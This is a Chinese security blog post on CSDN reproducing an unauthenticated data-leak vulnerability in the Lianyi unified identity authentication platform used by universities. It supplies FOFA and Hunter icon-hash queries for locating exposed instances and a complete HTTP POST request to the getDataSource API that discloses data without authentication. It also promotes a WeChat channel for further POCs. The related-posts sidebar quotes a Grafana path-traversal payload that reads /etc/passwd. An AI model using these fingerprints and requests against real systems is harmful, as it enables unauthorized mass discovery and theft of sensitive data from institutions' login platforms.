【漏洞复现】联奕统一身份认证平台getDataSource未授权访问漏洞

已于 2024-03-21 21:38:16 修改
阅读量545 收藏
点赞数 2
文章标签: 安全 web安全 网络 网络安全
于 2024-03-19 18:22:56 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_34780861/article/details/136850975
版权

更多干货POC获取,请关注公众号:如棠安全

0x01 阅读须知

如棠安全的技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!!!

Nx02 漏洞描述
        联奕统一信息门户平台(LYASP_v3.0)定位于对数字校园中的信息和应用系统进行整合,统一控制用户对信息和应用系统的访问,利用统一身份认证系统,为用户提供一个单一的访问入口(SSO)。

Nx03 产品主页
鹰图:web.icon=="7aa6546d2ecf33dc38c7587642aaf739"

fofa:icon_hash="772658742"

Nx04 产品主页

Nx05 漏洞复现

/api/bd-mdp/serviceManager/outInterface/getDataSource

POST /api/bd-mdp/serviceManager/outInterface/getDataSource HTTP/1.1
Host:xxx.xxx.xxx.xxx
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Content-Length: 0
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

更多干货POC获取,请关注公众号:如棠安全

如棠安全
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
ric-datasource:Rightech物联网平台的Grafana数据源
05-22
用于从RighTech IoT平台接收遥测入门指南 git clone https://github.com/Rightech/ric-datasource.git /var/lib/grafana/plugins/ric-datasource添加一个新的数据源打开 通过GitHub或Google进行身份验证创建令牌 ...
ovh-warp10-datasource:用于Warp10平台的Grafana数据源
05-17
sudo grafana-cli plugins install ovh-warp10-datasource installing ovh-warp10-datasource @ 2.2.0 from: https://grafana.com/api/plugins/ovh-warp10-datasource/versions/2.2.0/download into: /var/lib/...
漏洞复现联奕统一身份认证平台getDataSource存在信息泄露漏洞
https://blog.echo234.cn/
03-28 575
联奕统一身份认证平台 getDataSource 授权访问,攻击者可通过此漏洞获取敏感信息。
Grafana 授权任意文件读取漏洞复现
渗透测试研究中心
12-16 5384
1.fofa 批量搜索 app="Grafana" 漏洞URL: {{BaseURL}}/public/plugins/{{plugin-id}}/../../../../../../../../../../../../../../../../../../../etc/passwd 2.获取远程目标linux系统的/etc/passwd密码信息 /public/plugins/alertGroups/../../../../../../../../etc/passwd/public/plugin
一文教你如何绕过统一认证拿到赏金
weixin_52501704的博客
12-26 633
我发现了一个关键的逻辑:如果用户的Cookie中缺乏“auth”(认证)标记,系统则会自动触发重定向到统一认证页面的机制。更令人兴奋的是,在对网站的技术结构进行进一步的探索时,我注意到了网站使用了Webpack框架。这个看似简单的动作产生了意想不到的效果:它成功地欺骗了网站的认证机制,使我能够绕过原本的统一认证流程。经过之前的实验,成功绕过了统一认证的重定向后,我对网站的两个关键按钮进行了深入的功能测试。在本文中,我将与您分享我的发现过程,探讨这种机制的工作原理,以及它对用户体验和网络安全的意义。
联奕“云计算”数字校园整体解决方案,让高校云计算不再是“浮云”
weixin_34357267的博客
02-16 431
——记广州大学数字校园“云计算”应用数据中心建设 舒 畅 摘要:在云计算技术日渐成熟的今天,广州大学另辟蹊径,与其他高校以高性能计算为起点搭建云计算平台不同,联手广州联奕信息科技有限公司,以资源整合和信息服务作为切入点,以高效快捷、开放服务为原则,以全面构建数字校园综合服务体系为目标,设计了基于“云计算”的应用数据中心整体解决方案,并且在RedHat、华胜天成、DELL...
授权访问漏洞总结
LuckySec
03-24 4714
前言:这篇文章主要收集一些常见的授权访问漏洞授权访问漏洞可以理解为需要安全配置或权限认证的地址、授权页面存在缺陷导致其他用户可以直接访问从而引发重要权限可被操作、数据库或网站目录等敏感信息泄露。 0x01 授权漏洞预览 Active MQ 授权访问 Atlassian Crowd 授权访问 CouchDB 授权访问 Docker 授权访问 Dubbo 授权访问 Druid 授权访问 Elasticsearch 授权访问 FTP 授权访问 Hadoop 授权访问 JBoss 授权访
浅析SpringBoot框架常见授权访问漏洞
道阻且长,行则将至。
02-23 5292
本文总结学习了 Swagger-UI、SpringBoot Actuator、Druid、Webpack 组件的授权访问漏洞基本原理与漏洞探测方法,在介绍了几款自动化扫描工具的同时,也简要分析了 CVE-2022-22947 Spring Cloud Gateway RCE 漏洞
Apache druid授权命令执行漏洞复现(CVE-2021-25646)
deng_menglihua的博客
04-19 3509
Apache druid授权命令执行漏洞复现(CVE-2021-25646) 1.简介 Apache Druid 是用Java编写的面向列的开源分布式数据存储,旨在快速获取大量事件数据,并在数据之上提供低延迟查询。 2.漏洞概述 编号:CVE-2021-25646(严重) Apache Druid 默认情况下缺乏授权认证,攻击者可以发送特制请求,利用Druid服务器上进程的特权执行任意代码。 3.影响版本 Apache Druid < 0.20.1 4.环境搭建 ubuntu 1.安装doc
datasphere-datasource:统一的数据源连接器
05-26
数据层数据源 统一的数据源连接器
oauth2-server:基于Spring Security OAuth的统一账号管理平台
03-27
OAuth2授权码登录(开发完成) OAuth2刷新TOKEN(开发完成) 微信登录(开发完成) 短信登录(开发完成) 文件 技术栈: Sprint Boot Spring安全 Spring安全OAuth2 Mybatis 环境依赖: JRE1.8 的Mysql5.7 配置...
dataSourceSwitch_DataSourceSwitch_solar8t4_springbootmysql_DataS
10-03
数据源切换项目,可真实用在生产中,数据库用的是mysql,项目是springboot
VirtualBox 7.0.18 安装在D盘文件下,会提示目录不安全等信息,不让安装
最新发布
qq_43684686的博客
06-17 118
VirtualBox 7.0.18 安装在D盘文件下,会提示目录不安全等信息,不让安装。重新执行安装程安装到 d:\a-vm。在D盘新建一个文件夹a-vm,
MVC 框架安全
A526847的博客
06-17 534
举例来说,在“注入攻击”一章中,我们并没有使用 PHP 的 magic_quotes_gpc 作为一项 对抗 SQL 注入的防御方案,这是因为 magic_quotes_gpc 是有缺陷的,它并没有在正确的地方 解决问题。其次,对于一些常见的漏洞来说,由程序员一个个修补可能会出现遗漏,而在框架中统一 解决,有可能解决“遗漏”的问题。最后,在每个业务里修补安全漏洞,补丁的标准难以统一,而在框架中集中实施的安全方 案,可以使所有基于框架开发的业务都能受益,从安全方案的有效性来说,更容易把握。
如何确保数据跨域交换安全、合规、可追溯性?
文件数据安全交换
06-14 545
飞驰云联是中国领先的数据安全传输解决方案提供商,长期专注于安全可控、性能卓越的数据传输技术和解决方案,公司产品和方案覆盖了跨网跨区域的数据安全交换、供应链数据安全传输、数据传输过程的防泄漏、FTP的增强和国产化替代、文件传输自动化和传输集成等各种数据传输场景。针对上述问题,推荐采用统一的数据跨域交换管控平台,如飞驰云联《Ftrans MDE多区域文件交换系统》,帮助企业构建统一安全、高效的数据跨域交换通道,确保数据在多地理区域、多网络区域、多分支机构间准确、高效地传输。问题:明文传输,容易被截获和窃取;
Java中的安全管理器和权限控制
weixin_53840353的博客
06-13 649
Java安全管理器是一种允许应用程序在运行时检查对系统资源(如文件和网络)的访问权限的机制。通过定义和安装自定义的安全策略,程序员可以控制哪些代码能够执行特定的操作,从而保护系统资源的安全。@Override// 自定义安全策略throw new SecurityException("写文件操作被禁止!");try {// 尝试写文件操作System.err.println("安全异常:" + e.getMessage());在这个示例中,自定义的禁止所有文件写操作。
NTFS安全权限
2302_80097039的博客
06-12 778
NTFS权限是基于。
springboot项目如何通过配置文件配置解决Druid授权访问漏洞 禁用Druid Monitor
06-10
可以通过在配置文件中添加以下配置来解决Druid授权访问漏洞,禁用Druid Monitor: ```yaml # 禁用Druid Monitor spring.datasource.druid.stat-view-servlet.enabled=false spring.datasource.druid.stat-view-...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值